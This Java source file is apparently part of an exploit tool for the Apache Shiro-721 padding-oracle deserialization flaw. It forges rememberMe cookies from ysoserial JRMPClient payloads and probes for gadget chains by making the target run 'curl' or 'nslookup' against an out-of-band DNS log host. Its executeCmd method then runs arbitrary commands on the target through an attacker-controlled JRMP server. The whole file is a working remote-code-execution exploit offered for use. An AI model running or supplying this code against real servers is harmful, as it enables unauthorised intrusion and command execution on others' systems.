package com.shiroexploit.vulnverifier;

import com.shiroexploit.core.PaddingOracle;
import com.shiroexploit.util.*;
import java.io.File;
import java.util.*;

public class Shiro721VerifierWithJRMP implements Verifier {
    private Config config;
    private List<PayloadType> gadgets;
    private boolean flag;

    public Shiro721VerifierWithJRMP(){
        System.out.println("[*] Using Shiro721VerifierWithJRMP");
        this.config = Config.getInstance();
        this.gadgets = new ArrayList<>();
    }

    @Override
    public void getValidGadget() throws ExploitFailedException {
        for(PayloadType type : config.getGadgets()){

            System.out.println("[*] Trying Gadget: " + type.getName());
            String uuid = UUID.randomUUID().toString().replaceAll("-", "");
            String command;
            if(config.getPlatform() == 0){
                //linux
                command = "curl http://" + uuid + "." + config.getDnsLogRecord();
            }else{
                //windows
                command = "nslookup " + uuid + "." + config.getDnsLogRecord();
            }

            process(command, type);

            if(Tools.getValidDNSLogRecord(uuid)){
                this.gadgets.add(type);
                System.out.println("[+] Find Valid Gadget: " + type.getName());
                if(config.isSkipIfFound()){
                    break;
                }
            }
        }

        this.flag = true;
        if(this.gadgets.size() == 0){
            throw new ExploitFailedException("[-] Can't find a valid gadget");
        }
    }

    @Override
    public String executeCmd(String cmd){

        for(PayloadType gadget : this.gadgets){
            System.out.println("[*] Using Gadget " + gadget.getName());
            System.out.println("[*] Executing command: " + cmd + "...");

            Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), gadget, cmd);

            String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort();
            byte[] result = Tools.exec(command);
            PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), result);
            String rememberMe = null;
            try {
                rememberMe = paddingOracle.encrypt();
            } catch (ExploitFailedException e) {
                e.printStackTrace();
            }
            HttpRequest.request(config.getRequestInfo(), rememberMe);
            System.out.println("[+] Done");
        }

        return null;
    }

    private void process(String command, PayloadType payloadType) throws ExploitFailedException {
        Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), payloadType, command);

        command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort();
        byte[] payload = Tools.exec(command);
        PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), payload);
        String rememberMe = paddingOracle.encrypt();
        HttpRequest.request(config.getRequestInfo(), rememberMe);

        try{
            Thread.sleep(config.getJRMPRequestDelay() * 1000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}
